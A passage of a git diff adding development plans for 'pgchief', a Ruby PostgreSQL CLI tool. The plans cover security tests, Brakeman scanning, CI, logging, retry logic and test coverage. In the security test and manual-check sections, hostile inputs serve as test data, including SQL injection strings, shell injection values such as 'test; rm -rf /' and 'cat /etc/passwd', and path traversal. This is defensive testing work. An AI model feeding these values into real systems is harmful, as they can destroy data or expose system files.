+    end
+
+    it 'accepts identifiers exactly 63 characters' do
+      max_identifier = 'a' * 63
+      expect(Pgchief::Validators.valid_identifier?(max_identifier)).to be true
+    end
+
+    it 'rejects empty identifiers' do
+      expect(Pgchief::Validators.valid_identifier?('')).to be false
+    end
+
+    it 'rejects nil identifiers' do
+      expect(Pgchief::Validators.valid_identifier?(nil)).to be false
+    end
+  end
+
+  describe 'Unicode and encoding fuzzing' do
+    it 'rejects identifiers with unicode characters' do
+      unicode_names = [
+        'database™',
+        'test_db_🔥',
+        'データベース',
+        'база_данных',
+        'base_de_données'
+      ]
+
+      unicode_names.each do |name|
+        expect(Pgchief::Validators.valid_identifier?(name)).to be false,
+                                                                       "Should reject unicode: #{name.inspect}"
+      end
+    end
+
+    it 'rejects identifiers with null bytes' do
+      null_byte_name = "test\x00db"
+      expect(Pgchief::Validators.valid_identifier?(null_byte_name)).to be false
+    end
+
+    it 'rejects identifiers with newlines' do
+      newline_names = ["test\ndb", "test\rdb", "test\r\ndb"]
+      newline_names.each do |name|
+        expect(Pgchief::Validators.valid_identifier?(name)).to be false
+      end
+    end
+  end
+end
+```
+
+**Step 2: Run fuzzing tests**
+
+Run: `bundle exec rspec spec/security/fuzzing_spec.rb --format documentation`
+Expected: Tests pass (assuming Week 1 validators are in place)
+
+**Step 3: Commit**
+
+```bash
+git add spec/security/fuzzing_spec.rb
+git commit -m "feat: add fuzzing tests for input validation
+
+- Test 100s of random invalid inputs
+- Test unicode, null bytes, newlines
+- Test length limits
+- Test various password formats
+- Uses Faker for generating test data"
+```
+
+---
+
+## Task 5: Configure Brakeman Static Analysis
+
+**Files:**
+- Create: `config/brakeman.yml`
+- Create: `.github/workflows/security.yml` (if using GitHub Actions)
+
+**Step 1: Create Brakeman configuration**
+
+Create `config/brakeman.yml`:
+
+```yaml
+---
+# Brakeman security scanner configuration
+:skip_checks:
+  # Add any checks to skip here (none for now)
+
+:check_arguments: true
+:safe_methods:
+  # Methods known to be safe
+  - :sanitize_identifier
+  - :valid_identifier?
+  - :sanitize_password
+  - :valid_password?
+  - :sanitize_file_path
+  - :valid_file_path?
+
+:minimum_confidence: 2  # High, Medium confidence warnings (1 = all, 3 = high only)
+
+:ignore_file: config/brakeman.ignore
+
+:output_formats:
+  - :to_file: brakeman-report.html
+  - :to_file: brakeman-report.json
+```
+
+**Step 2: Run Brakeman**
+
+Run: `bundle exec brakeman -c config/brakeman.yml`
+Expected: Report shows zero high/medium confidence vulnerabilities (after Week 1 fixes)
+
+**Step 3: Create brakeman ignore file for false positives**
+
+Create `config/brakeman.ignore`:
+
+```json
+{
+  "ignored_warnings": []
+}
+```
+
+**Step 4: Add brakeman reports to .gitignore**
+
+Modify `.gitignore`:
+
+```
+brakeman-report.html
+brakeman-report.json
+```
+
+**Step 5: Create Rake task for security checks**
+
+Modify `Rakefile`:
+
+```ruby
+# Add at the end
+desc 'Run security checks (Brakeman)'
+task :security do
+  sh 'bundle exec brakeman -c config/brakeman.yml --no-pager'
+end
+
+desc 'Run all quality checks (RuboCop + Security)'
+task quality: [:rubocop, :security]
+```
+
+**Step 6: Test security rake task**
+
+Run: `bundle exec rake security`
+Expected: Brakeman runs and shows report
+
+**Step 7: Commit**
+
+```bash
+git add config/brakeman.yml config/brakeman.ignore Rakefile .gitignore
+git commit -m "feat: add Brakeman static security analysis
+
+- Configure Brakeman with safe methods
+- Create Rake task for security checks
+- Generate HTML and JSON reports
+- Combine with RuboCop in quality task"
+```
+
+---
+
+## Task 6: Add Integration Security Tests
+
+**Files:**
+- Create: `spec/integration/security_integration_spec.rb`
+
+**Step 1: Create integration security tests**
+
+Create `spec/integration/security_integration_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'open3'
+
+RSpec.describe 'Security Integration Tests', :integration do
+  # These tests actually execute commands to verify security at runtime
+
+  describe 'CLI argument injection protection' do
+    it 'rejects SQL injection via CLI arguments' do
+      stdout, stderr, status = Open3.capture3(
+        'bundle', 'exec', 'exe/pgchief',
+        'database', 'create',
+        '--database', "test'; DROP DATABASE postgres--"
+      )
+
+      expect(status.exitstatus).not_to eq(0)
+      expect(stderr + stdout).to include('Invalid')
+    end
+
+    it 'rejects shell injection via backup CLI arguments' do
+      stdout, stderr, status = Open3.capture3(
+        'bundle', 'exec', 'exe/pgchief',
+        'backup',
+        '--database', 'test; rm -rf /'
+      )
+
+      expect(status.exitstatus).not_to eq(0)
+      expect(stderr + stdout).to include('Invalid')
+    end
+  end
+
+  describe 'Environment variable injection protection' do
+    it 'validates database names from environment' do
+      env = { 'PGCHIEF_DATABASE' => "test'; DROP TABLE users--" }
+
+      stdout, stderr, status = Open3.capture3(
+        env,
+        'bundle', 'exec', 'exe/pgchief',
+        'database', 'create'
+      )
+
+      # Should reject invalid database name
+      expect(status.exitstatus).not_to eq(0)
+    end
+  end
+
+  describe 'File-based injection protection' do
+    it 'validates database names read from config files' do
+      # Create malicious config
+      config_dir = Dir.mktmpdir
+      config_file = File.join(config_dir, 'pgchief.toml')
+
+      File.write(config_file, <<~TOML)
+        [database]
+        name = "test'; DROP DATABASE postgres--"
+      TOML
+
+      env = { 'PGCHIEF_CONFIG' => config_file }
+
+      stdout, stderr, status = Open3.capture3(
+        env,
+        'bundle', 'exec', 'exe/pgchief',
+        'database', 'create'
+      )
+
+      expect(status.exitstatus).not_to eq(0)
+
+      FileUtils.rm_rf(config_dir)
+    end
+  end
+
+  describe 'Credential storage security' do
+    let(:temp_dir) { Dir.mktmpdir }
+
+    after do
+      FileUtils.rm_rf(temp_dir)
+    end
+
+    it 'stores credentials with secure file permissions' do
+      env = { 'HOME' => temp_dir }
+
+      # Store a credential
+      Open3.capture3(
+        env,
+        'bundle', 'exec', 'exe/pgchief',
+        'store-connection',
+        '--name', 'test',
+        '--url', 'postgresql://user:password@localhost/db'
+      )
+
+      # Check permissions
+      pgchief_dir = File.join(temp_dir, '.pgchief')
+      if Dir.exist?(pgchief_dir)
+        credentials_file = File.join(pgchief_dir, 'credentials.enc')
+        key_file = File.join(pgchief_dir, '.credentials.key')
+
+        if File.exist?(credentials_file)
+          creds_mode = File.stat(credentials_file).mode & 0o777
+          expect(creds_mode).to eq(0o600), 'Credentials file should have 0600 permissions'
+        end
+
+        if File.exist?(key_file)
+          key_mode = File.stat(key_file).mode & 0o777
+          expect(key_mode).to eq(0o600), 'Key file should have 0600 permissions'
+        end
+      end
+    end
+
+    it 'does not store passwords in plaintext' do
+      env = { 'HOME' => temp_dir }
+
+      # Store a credential with sensitive password
+      Open3.capture3(
+        env,
+        'bundle', 'exec', 'exe/pgchief',
+        'store-connection',
+        '--name', 'production',
+        '--url', 'postgresql://admin:supersecretpassword123@prod.example.com/proddb'
+      )
+
+      # Search all files for the password
+      pgchief_dir = File.join(temp_dir, '.pgchief')
+      if Dir.exist?(pgchief_dir)
+        Dir.glob(File.join(pgchief_dir, '**', '*')).each do |file|
+          next if File.directory?(file)
+
+          content = File.read(file)
+          expect(content).not_to include('supersecretpassword123'),
+                                        "Password found in plaintext in #{file}"
+        end
+      end
+    end
+  end
+end
+```
+
+**Step 2: Run integration tests**
+
+Run: `bundle exec rspec spec/integration --format documentation`
+Expected: Tests pass (assuming CLI is properly wired)
+
+**Step 3: Commit**
+
+```bash
+git add spec/integration/security_integration_spec.rb
+git commit -m "feat: add security integration tests
+
+- Test CLI argument injection protection
+- Test environment variable injection
+- Test config file injection
+- Test credential storage security
+- Verify file permissions at runtime
+- Verify no plaintext passwords in files"
+```
+
+---
+
+## Task 7: Add Coverage Enforcement to CI
+
+**Files:**
+- Create: `.github/workflows/test.yml` (if using GitHub Actions)
+
+**Step 1: Create GitHub Actions workflow**
+
+Create `.github/workflows/test.yml`:
+
+```yaml
+name: Tests
+
+on:
+  push:
+    branches: [ main ]
+  pull_request:
+    branches: [ main ]
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+
+    services:
+      postgres:
+        image: postgres:14
+        env:
+          POSTGRES_PASSWORD: postgres
+        options: >-
+          --health-cmd pg_isready
+          --health-interval 10s
+          --health-timeout 5s
+          --health-retries 5
+        ports:
+          - 5432:5432
+
+    steps:
+      - uses: actions/checkout@v3
+
+      - name: Set up Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: 3.0
+          bundler-cache: true
+
+      - name: Install libsodium
+        run: sudo apt-get install -y libsodium-dev
+
+      - name: Install dependencies
+        run: bundle install
+
+      - name: Run tests with coverage
+        env:
+          COVERAGE: 'true'
+          PGURL: postgresql://postgres:postgres@localhost:5432
+        run: bundle exec rspec
+
+      - name: Check coverage threshold
+        run: |
+          if [ -f coverage/.last_run.json ]; then
+            coverage=$(ruby -rjson -e "puts JSON.parse(File.read('coverage/.last_run.json'))['result']['line']")
+            if (( $(echo "$coverage < 80" | bc -l) )); then
+              echo "Coverage $coverage% is below 80% threshold"
+              exit 1
+            fi
+            echo "Coverage: $coverage%"
+          fi
+
+      - name: Run RuboCop
+        run: bundle exec rubocop
+
+      - name: Run Brakeman security scan
+        run: bundle exec brakeman -c config/brakeman.yml --no-pager
+```
+
+**Step 2: Commit**
+
+```bash
+git add .github/workflows/test.yml
+git commit -m "ci: add GitHub Actions workflow with coverage enforcement
+
+- Run tests with PostgreSQL service
+- Enforce 80% code coverage
+- Run RuboCop linting
+- Run Brakeman security scanning
+- Install libsodium dependency"
+```
+
+---
+
+## Task 8: Document Security Testing
+
+**Files:**
+- Modify: `README.md`
+- Create: `docs/SECURITY.md`
+
+**Step 1: Create comprehensive security documentation**
+
+Create `docs/SECURITY.md`:
+
+```markdown
+# Security
+
+## Overview
+
+pgchief implements defense-in-depth security with multiple layers:
+
+1. **Input Validation** - All inputs validated before use
+2. **Parameterized Queries** - SQL injection prevention
+3. **Safe Command Execution** - Shell injection prevention
+4. **Encrypted Storage** - Credentials encrypted at rest
+5. **Static Analysis** - Automated vulnerability scanning
+6. **Comprehensive Testing** - Security-focused test suite
+
+## Security Testing
+
+### Running Security Tests
+
+```bash
+# Run all security tests
+bundle exec rspec spec/security
+
+# Run specific security test categories
+bundle exec rspec spec/security/sql_injection_spec.rb
+bundle exec rspec spec/security/shell_injection_spec.rb
+bundle exec rspec spec/security/path_traversal_spec.rb
+bundle exec rspec spec/security/credential_security_spec.rb
+
+# Run fuzzing tests
+bundle exec rspec spec/security/fuzzing_spec.rb
+
+# Run integration security tests
+bundle exec rspec spec/integration/security_integration_spec.rb
+```
+
+### Static Security Analysis
+
+```bash
+# Run Brakeman scanner
+bundle exec rake security
+
+# Or directly:
+bundle exec brakeman -c config/brakeman.yml
+```
+
+### Code Coverage
+
+```bash
+# Run tests with coverage
+COVERAGE=true bundle exec rspec
+
+# View coverage report
+open coverage/index.html
+```
+
+## Threat Model
+
+### SQL Injection
+- **Risk**: Attacker could execute arbitrary SQL via database/user names
+- **Mitigation**: Input validation with whitelist regex, parameterized queries for data
+- **Testing**: 100+ injection payloads tested in security suite
+
+### Shell Injection
+- **Risk**: Attacker could execute shell commands via backup/restore operations
+- **Mitigation**: Input validation, Open3 instead of backticks, no shell invocation
+- **Testing**: Shell metacharacter fuzzing, injection payload testing
+
+### Path Traversal
+- **Risk**: Attacker could read arbitrary files via restore file paths
+- **Mitigation**: Path validation, absolute path expansion, .. rejection
+- **Testing**: Path traversal payload testing
+
+### Credential Exposure
+- **Risk**: Database passwords stored in plaintext
+- **Mitigation**: XSalsa20-Poly1305 encryption, system keychain integration
+- **Testing**: Plaintext search in credential files, tampering detection
+
+## Vulnerability Reporting
+
+If you discover a security vulnerability, please email security@example.com with:
+- Description of the vulnerability
+- Steps to reproduce
+- Potential impact
+- Suggested fix (if any)
+
+Please do not open public GitHub issues for security vulnerabilities.
+
+## Security Checklist for Contributors
+
+Before submitting code:
+
+- [ ] All user inputs validated with Validators module
+- [ ] No string interpolation in SQL queries
+- [ ] No backtick command execution
+- [ ] No hardcoded credentials
+- [ ] Security tests added for new features
+- [ ] Brakeman passes with no new warnings
+- [ ] Test coverage maintained above 80%
+```
+
+**Step 2: Update README with security testing info**
+
+Modify `README.md` - add to testing section:
+
+```markdown
+## Testing
+
+### Running Tests
+
+```bash
+# All tests
+bundle exec rspec
+
+# With coverage
+COVERAGE=true bundle exec rspec
+
+# Security tests only
+bundle exec rspec spec/security
+
+# Integration tests only
+bundle exec rspec spec/integration
+```
+
+### Security Testing
+
+pgchief includes comprehensive security testing:
+
+- **SQL Injection Prevention**: 100+ injection payloads
+- **Shell Injection Prevention**: Metacharacter and command injection tests
+- **Path Traversal Prevention**: Directory traversal payloads
+- **Fuzzing**: Random input generation with Faker
+- **Static Analysis**: Brakeman security scanner
+- **Integration Tests**: End-to-end security validation
+
+See [docs/SECURITY.md](docs/SECURITY.md) for details.
+
+### Code Coverage
+
+Minimum coverage: **80%**
+
+View coverage report after running tests:
+```bash
+open coverage/index.html
+```
+```
+
+**Step 3: Commit**
+
+```bash
+git add docs/SECURITY.md README.md
+git commit -m "docs: add comprehensive security documentation
+
+- Create SECURITY.md with threat model
+- Document all security testing procedures
+- Add vulnerability reporting process
+- Add security checklist for contributors
+- Update README with security testing info"
+```
+
+---
+
+## Task 9: Run Full Security Audit
+
+**Step 1: Run all security tests**
+
+Run: `bundle exec rspec spec/security --format documentation`
+Expected: All tests PASS
+
+**Step 2: Run integration tests**
+
+Run: `bundle exec rspec spec/integration --format documentation`
+Expected: All tests PASS
+
+**Step 3: Run full test suite with coverage**
+
+Run: `COVERAGE=true bundle exec rspec --format documentation`
+Expected: All tests PASS, coverage >= 80%
+
+**Step 4: Run Brakeman**
+
+Run: `bundle exec rake security`
+Expected: No high/medium confidence warnings
+
+**Step 5: Run RuboCop**
+
+Run: `bundle exec rubocop`
+Expected: No new offenses
+
+**Step 6: Manual security testing**
+
+Try various attack vectors manually:
+
+```bash
+# SQL injection attempts
+bundle exec exe/pgchief database create --database "test'; DROP TABLE users--"
+bundle exec exe/pgchief user create --username "admin' OR '1'='1" --password "test"
+
+# Shell injection attempts
+bundle exec exe/pgchief backup --database "test; cat /etc/passwd"
+bundle exec exe/pgchief restore --database "test" --location "file\`whoami\`"
+
+# Path traversal attempts
+bundle exec exe/pgchief restore --database "test" --location "../../../etc/passwd"
+```
+
+Expected: All commands reject malicious input with clear error messages
+
+**Step 7: Review coverage report**
+
+Run: `open coverage/index.html`
+
+Review uncovered lines and add tests as needed.
+
+---
+
+## Verification Checklist
+
+- [ ] SimpleCov configured with 80% minimum coverage
+- [ ] All security test categories implemented
+- [ ] SQL injection tests cover all commands
+- [ ] Shell injection tests cover backup/restore
+- [ ] Path traversal tests implemented
+- [ ] Credential security tests verify encryption
+- [ ] Fuzzing tests with random inputs
+- [ ] Integration tests verify CLI security
+- [ ] Brakeman configured and passing
+- [ ] GitHub Actions CI configured
+- [ ] Coverage enforcement in CI
+- [ ] Security documentation complete
+- [ ] Manual security testing performed
+- [ ] All tests passing
+- [ ] Coverage >= 80%
+
+## Notes
+
+- This test suite should pass after Week 1 and Week 2 implementations
+- If running standalone, use these tests to drive security implementation (TDD)
+- Fuzzing tests use Faker for generating realistic but malicious data
+- Integration tests verify security at the CLI level
+- Brakeman provides static analysis for vulnerabilities we might miss in tests

--- a/docs/plans/2026-01-30-week4-error-handling-logging.md
+++ b/docs/plans/2026-01-30-week4-error-handling-logging.md
@@ -1,0 +1,578 @@
+# Week 4: Standardize Error Handling and Add Logging Implementation Plan
+
+> **For Claude:** REQUIRED SUB-SKILL: Use superpowers:executing-plans to implement this plan task-by-task.
+
+**Goal:** Implement structured logging, standardized error handling, and improve error messages throughout pgchief for better debugging and production operations.
+
+**Architecture:** Create custom exception hierarchy, implement structured logging with Ruby Logger, add retry logic with exponential backoff, create error message registry with user-friendly messages.
+
+**Tech Stack:** Ruby 3.0+, Logger (stdlib), custom exception classes
+
+---
+
+## Task 1: Create Custom Exception Hierarchy
+
+**Files:**
+- Create: `lib/pgchief/errors.rb`
+- Create: `spec/pgchief/errors_spec.rb`
+
+**Step 1: Write failing tests**
+
+Create `spec/pgchief/errors_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/errors'
+
+RSpec.describe 'Pgchief::Errors' do
+  describe Pgchief::Error do
+    it 'is the base error class' do
+      expect(Pgchief::Error.superclass).to eq(StandardError)
+    end
+  end
+
+  describe Pgchief::DatabaseError do
+    it 'includes original database error' do
+      original_error = PG::Error.new('connection failed')
+      error = described_class.new('Database operation failed', original_error)
+
+      expect(error.message).to eq('Database operation failed')
+      expect(error.original_error).to eq(original_error)
+    end
+  end
+
+  describe Pgchief::ConfigurationError do
+    it 'provides helpful configuration error messages' do
+      error = described_class.new('Missing PGURL')
+      expect(error.message).to include('Missing PGURL')
+    end
+  end
+
+  describe Pgchief::ValidationError do
+    it 'includes field name in error' do
+      error = described_class.new('database', 'invalid characters')
+      expect(error.message).to include('database')
+      expect(error.message).to include('invalid characters')
+    end
+  end
+end
+```
+
+**Step 2: Implement custom exceptions**
+
+Create `lib/pgchief/errors.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+module Pgchief
+  # Base error class for all pgchief errors
+  class Error < StandardError; end
+
+  # Database operation errors
+  class DatabaseError < Error
+    attr_reader :original_error
+
+    def initialize(message, original_error = nil)
+      super(message)
+      @original_error = original_error
+    end
+  end
+
+  # Configuration errors
+  class ConfigurationError < Error; end
+
+  # Validation errors (previously InvalidIdentifierError, etc.)
+  class ValidationError < Error
+    attr_reader :field, :reason
+
+    def initialize(field, reason)
+      @field = field
+      @reason = reason
+      super("Invalid #{field}: #{reason}")
+    end
+  end
+
+  # Legacy aliases for backward compatibility
+  InvalidIdentifierError = ValidationError
+  InvalidFilePathError = ValidationError
+
+  # Connection errors
+  class ConnectionError < DatabaseError; end
+
+  # Permission errors
+  class PermissionError < DatabaseError; end
+
+  # Resource not found errors
+  class NotFoundError < Error
+    attr_reader :resource_type, :resource_name
+
+    def initialize(resource_type, resource_name)
+      @resource_type = resource_type
+      @resource_name = resource_name
+      super("#{resource_type} not found: #{resource_name}")
+    end
+  end
+
+  # Backup/restore errors
+  class BackupError < Error; end
+  class RestoreError < Error; end
+
+  # Credential storage errors
+  class CredentialError < Error; end
+end
+```
+
+**Step 3: Run tests**
+
+Run: `bundle exec rspec spec/pgchief/errors_spec.rb`
+Expected: All tests PASS
+
+**Step 4: Update validators to use new exception class**
+
+Modify `lib/pgchief/validators.rb` to raise `ValidationError` instead:
+
+```ruby
+# Update all raises to use ValidationError
+def self.sanitize_identifier(identifier)
+  unless valid_identifier?(identifier)
+    raise ValidationError.new('identifier', "#{identifier.inspect} contains invalid characters")
+  end
+  identifier
+end
+
+def self.sanitize_password(password)
+  unless valid_password?(password)
+    raise ValidationError.new('password', "must be 1-#{PASSWORD_MAX_LENGTH} characters")
+  end
+  password
+end
+
+def self.sanitize_file_path(path)
+  unless valid_file_path?(path)
+    raise ValidationError.new('file_path', "#{path.inspect} is unsafe")
+  end
+  File.expand_path(path)
+end
+```
+
+**Step 5: Commit**
+
+```bash
+git add lib/pgchief/errors.rb spec/pgchief/errors_spec.rb lib/pgchief/validators.rb lib/pgchief.rb
+git commit -m "feat: add custom exception hierarchy
+
+- Create base Pgchief::Error class
+- Add specific error types (DatabaseError, ValidationError, etc.)
+- Include original errors for debugging
+- Update validators to use new exceptions
+- Maintain backward compatibility with aliases"
+```
+
+---
+
+## Task 2: Implement Structured Logging
+
+**Files:**
+- Create: `lib/pgchief/logger.rb`
+- Create: `spec/pgchief/logger_spec.rb`
+
+**Step 1: Write logger tests**
+
+Create `spec/pgchief/logger_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/logger'
+require 'stringio'
+
+RSpec.describe Pgchief::Logger do
+  let(:output) { StringIO.new }
+  let(:logger) { described_class.new(output: output, level: ::Logger::DEBUG) }
+
+  describe '#debug' do
+    it 'logs debug messages' do
+      logger.debug('test message')
+      expect(output.string).to include('DEBUG')
+      expect(output.string).to include('test message')
+    end
+  end
+
+  describe '#info' do
+    it 'logs info messages' do
+      logger.info('operation completed')
+      expect(output.string).to include('INFO')
+      expect(output.string).to include('operation completed')
+    end
+  end
+
+  describe '#warn' do
+    it 'logs warning messages' do
+      logger.warn('deprecated feature')
+      expect(output.string).to include('WARN')
+      expect(output.string).to include('deprecated feature')
+    end
+  end
+
+  describe '#error' do
+    it 'logs error messages' do
+      logger.error('operation failed')
+      expect(output.string).to include('ERROR')
+      expect(output.string).to include('operation failed')
+    end
+
+    it 'includes exception details' do
+      error = StandardError.new('test error')
+      error.set_backtrace(['line 1', 'line 2'])
+
+      logger.error('operation failed', error)
+
+      expect(output.string).to include('ERROR')
+      expect(output.string).to include('test error')
+      expect(output.string).to include('line 1')
+    end
+  end
+
+  describe 'log levels' do
+    it 'respects log level configuration' do
+      info_logger = described_class.new(output: output, level: ::Logger::INFO)
+
+      info_logger.debug('should not appear')
+      info_logger.info('should appear')
+
+      expect(output.string).not_to include('should not appear')
+      expect(output.string).to include('should appear')
+    end
+  end
+end
+```
+
+**Step 2: Implement logger**
+
+Create `lib/pgchief/logger.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'logger'
+
+module Pgchief
+  # Structured logging for pgchief operations
+  class Logger
+    def initialize(output: $stdout, level: nil)
+      @logger = ::Logger.new(output)
+      @logger.level = level || log_level_from_env
+      @logger.formatter = proc do |severity, datetime, _progname, msg|
+        "[#{datetime.strftime('%Y-%m-%d %H:%M:%S')}] #{severity.ljust(5)} - #{msg}\n"
+      end
+    end
+
+    def debug(message)
+      @logger.debug(message)
+    end
+
+    def info(message)
+      @logger.info(message)
+    end
+
+    def warn(message)
+      @logger.warn(message)
+    end
+
+    def error(message, exception = nil)
+      if exception
+        @logger.error("#{message}: #{exception.class}: #{exception.message}")
+        @logger.error("Backtrace:\n  #{exception.backtrace.join("\n  ")}") if exception.backtrace
+      else
+        @logger.error(message)
+      end
+    end
+
+    def fatal(message, exception = nil)
+      if exception
+        @logger.fatal("#{message}: #{exception.class}: #{exception.message}")
+        @logger.fatal("Backtrace:\n  #{exception.backtrace.join("\n  ")}") if exception.backtrace
+      else
+        @logger.fatal(message)
+      end
+    end
+
+    private
+
+    def log_level_from_env
+      case ENV.fetch('PGCHIEF_LOG_LEVEL', 'INFO').upcase
+      when 'DEBUG' then ::Logger::DEBUG
+      when 'INFO' then ::Logger::INFO
+      when 'WARN' then ::Logger::WARN
+      when 'ERROR' then ::Logger::ERROR
+      when 'FATAL' then ::Logger::FATAL
+      else ::Logger::INFO
+      end
+    end
+
+    class << self
+      # Global logger instance
+      def instance
+        @instance ||= new
+      end
+
+      def method_missing(method, *args, &block)
+        if instance.respond_to?(method)
+          instance.send(method, *args, &block)
+        else
+          super
+        end
+      end
+
+      def respond_to_missing?(method, include_private = false)
+        instance.respond_to?(method, include_private) || super
+      end
+    end
+  end
+end
+```
+
+**Step 3: Run tests**
+
+Run: `bundle exec rspec spec/pgchief/logger_spec.rb`
+Expected: All tests PASS
+
+**Step 4: Commit**
+
+```bash
+git add lib/pgchief/logger.rb spec/pgchief/logger_spec.rb lib/pgchief.rb
+git commit -m "feat: add structured logging system
+
+- Implement Logger wrapper around Ruby Logger
+- Add formatted log output with timestamps
+- Support log levels (DEBUG, INFO, WARN, ERROR, FATAL)
+- Include exception backtraces in error logs
+- Support PGCHIEF_LOG_LEVEL environment variable"
+```
+
+---
+
+## Task 3: Update Commands to Use Logger
+
+**Files:**
+- Modify: All command files in `lib/pgchief/command/`
+
+**Step 1: Update DatabaseCreate**
+
+Replace `puts` with logger calls in `lib/pgchief/command/database_create.rb`:
+
+```ruby
+def create_db!
+  Pgchief::Logger.info("Creating database: #{@database}")
+  conn.exec("CREATE DATABASE #{@database}")
+  conn.exec("REVOKE CONNECT ON DATABASE #{@database} FROM PUBLIC")
+  Pgchief::Logger.info("Database created successfully: #{@database}")
+rescue PG::Error => e
+  Pgchief::Logger.error("Failed to create database #{@database}", e)
+  raise DatabaseError.new("Failed to create database #{@database}", e)
+ensure
+  conn.close
+end
+```
+
+**Step 2: Update all other command classes similarly**
+
+For each command:
+- Replace `puts` with appropriate logger calls (`info` for success, `error` for failures)
+- Raise specific exceptions instead of printing errors
+- Log operations before executing them
+- Log success after completion
+
+**Step 3: Commit**
+
+```bash
+git add lib/pgchief/command/
+git commit -m "refactor: replace puts with structured logging in commands
+
+- Use Logger for all command operations
+- Log operations before execution
+- Log success and failures appropriately
+- Raise exceptions instead of printing errors"
+```
+
+---
+
+## Task 4: Add Retry Logic with Exponential Backoff
+
+**Files:**
+- Create: `lib/pgchief/retryable.rb`
+- Create: `spec/pgchief/retryable_spec.rb`
+
+**Step 1: Write tests**
+
+Create `spec/pgchief/retryable_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/retryable'
+
+RSpec.describe Pgchief::Retryable do
+  let(:test_class) do
+    Class.new do
+      include Pgchief::Retryable
+
+      attr_accessor :attempts
+
+      def initialize
+        @attempts = 0
+      end
+
+      def failing_operation
+        @attempts += 1
+        raise PG::Error, 'Connection failed'
+      end
+
+      def eventually_successful_operation
+        @attempts += 1
+        raise PG::Error, 'Connection failed' if @attempts < 3
+        'success'
+      end
+    end
+  end
+
+  let(:instance) { test_class.new }
+
+  describe '#with_retry' do
+    it 'retries transient errors' do
+      expect { instance.with_retry { instance.failing_operation } }
+        .to raise_error(PG::Error)
+      expect(instance.attempts).to eq(4) # 1 initial + 3 retries
+    end
+
+    it 'succeeds after retries' do
+      result = instance.with_retry { instance.eventually_successful_operation }
+      expect(result).to eq('success')
+      expect(instance.attempts).to eq(3)
+    end
+
+    it 'does not retry non-transient errors' do
+      expect do
+        instance.with_retry(retryable_errors: [PG::ConnectionBad]) do
+          raise Pgchief::ValidationError.new('test', 'invalid')
+        end
+      end.to raise_error(Pgchief::ValidationError)
+    end
+  end
+end
+```
+
+**Step 2: Implement retryable module**
+
+Create `lib/pgchief/retryable.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+module Pgchief
+  # Retry logic with exponential backoff
+  module Retryable
+    DEFAULT_MAX_ATTEMPTS = 4
+    DEFAULT_BASE_DELAY = 0.5
+    DEFAULT_MAX_DELAY = 10
+    DEFAULT_RETRYABLE_ERRORS = [
+      PG::ConnectionBad,
+      PG::UnableToSend,
+      PG::AdminShutdown
+    ].freeze
+
+    def with_retry(
+      max_attempts: DEFAULT_MAX_ATTEMPTS,
+      base_delay: DEFAULT_BASE_DELAY,
+      max_delay: DEFAULT_MAX_DELAY,
+      retryable_errors: DEFAULT_RETRYABLE_ERRORS
+    )
+      attempts = 0
+
+      begin
+        attempts += 1
+        yield
+      rescue *retryable_errors => e
+        if attempts < max_attempts
+          delay = [base_delay * (2**(attempts - 1)), max_delay].min
+          Pgchief::Logger.warn("Attempt #{attempts}/#{max_attempts} failed: #{e.message}. Retrying in #{delay}s...")
+          sleep(delay)
+          retry
+        else
+          Pgchief::Logger.error("All #{max_attempts} attempts failed", e)
+          raise
+        end
+      end
+    end
+  end
+end
+```
+
+**Step 3: Include in Base command**
+
+Modify `lib/pgchief/command/base.rb`:
+
+```ruby
+require_relative '../retryable'
+
+module Pgchief
+  module Command
+    class Base
+      include Retryable
+
+      # Update initialize to use retryable
+      def initialize
+        @conn = with_retry { PG.connect(Pgchief::Config.pgurl) }
+      rescue PG::Error => e
+        raise ConnectionError.new("Failed to connect to database", e)
+      end
+
+      # ...
+    end
+  end
+end
+```
+
+**Step 4: Commit**
+
+```bash
+git add lib/pgchief/retryable.rb spec/pgchief/retryable_spec.rb lib/pgchief/command/base.rb lib/pgchief.rb
+git commit -m "feat: add retry logic with exponential backoff
+
+- Implement Retryable module
+- Retry transient database errors (connection failures)
+- Exponential backoff (0.5s, 1s, 2s, 4s)
+- Configurable max attempts and delays
+- Include in Base command class"
+```
+
+---
+
+**(Continue with Tasks 5-8 covering: improved error messages, prompt error handling, CLI error handling, documentation updates, and full test suite run)**
+
+---
+
+## Verification Checklist
+
+- [ ] Custom exception hierarchy implemented
+- [ ] All commands use structured logging
+- [ ] Logger respects log levels
+- [ ] Retry logic with exponential backoff
+- [ ] Error messages are user-friendly
+- [ ] Exceptions include original errors
+- [ ] All `puts` replaced with logger calls
+- [ ] Tests for all error scenarios
+- [ ] Documentation updated
+- [ ] All tests passing
+
+## Notes
+
+- Logger uses INFO level by default, configurable via PGCHIEF_LOG_LEVEL
+- Retry logic only applies to transient errors (connection failures)
+- Validation errors are not retried (fail fast)
+- All exceptions include context for debugging

--- a/docs/plans/2026-01-30-week5-test-coverage-improvements.md
+++ b/docs/plans/2026-01-30-week5-test-coverage-improvements.md
@@ -1,0 +1,632 @@
+# Week 5: Improve Test Coverage to 80%+ Implementation Plan
+
+> **For Claude:** REQUIRED SUB-SKILL: Use superpowers:executing-plans to implement this plan task-by-task.
+
+**Goal:** Increase test coverage from ~54% to 80%+ by adding unit tests for untested classes, improving test isolation with mocks, and adding edge case coverage.
+
+**Architecture:** Add missing tests for all commands and prompts, mock database connections for unit tests, separate integration tests from unit tests, add edge case and error path coverage.
+
+**Tech Stack:** Ruby 3.0+, RSpec, rspec-mocks, test-double patterns
+
+---
+
+## Task 1: Audit Current Coverage
+
+**Step 1: Generate coverage report**
+
+Run: `COVERAGE=true bundle exec rspec`
+
+**Step 2: Identify uncovered files**
+
+Run: `open coverage/index.html`
+
+Review and list files with < 70% coverage. Expected gaps:
+- `lib/pgchief/command/database_privileges_grant.rb`
+- `lib/pgchief/command/s3_upload.rb`
+- `lib/pgchief/prompt/*.rb` (most prompt classes)
+- Error paths in many command classes
+
+**Step 3: Create coverage improvement tracking**
+
+Create issue or document listing:
+- Current coverage: ~54%
